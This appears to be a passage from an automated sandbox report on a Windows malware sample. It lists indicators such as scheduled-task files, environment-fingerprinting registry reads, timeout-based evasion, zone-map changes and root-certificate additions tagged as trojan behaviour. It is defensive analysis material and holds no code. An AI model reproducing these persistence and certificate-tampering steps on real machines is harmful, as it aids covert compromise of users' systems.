File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\iXGtiDm.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\leakrepair.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ELAMBKUP C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File created C:\Windows\ELAMBKUP\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\360Safe\360Scan C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID\ = "MenuEx.SD360MN.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open\command C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\Icon = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\",0" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\Version = "1.0" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ = "ISD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS\ = "0" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\Programmable C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\ = "MenuEx 1.0 Type Library" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\.TotalSecurity\ = "360TotalSecurity.ext.1" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer\ = "MenuEx.SD360MN.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" %1" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\" /runclean" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID\ = "MenuEx.SD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\360\\Total Security" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ = "ISD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\.TotalSecurity C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\Version = "1.0" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31E2C52CE1089BEFFDDADB26DD7C782EBC4037BD C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
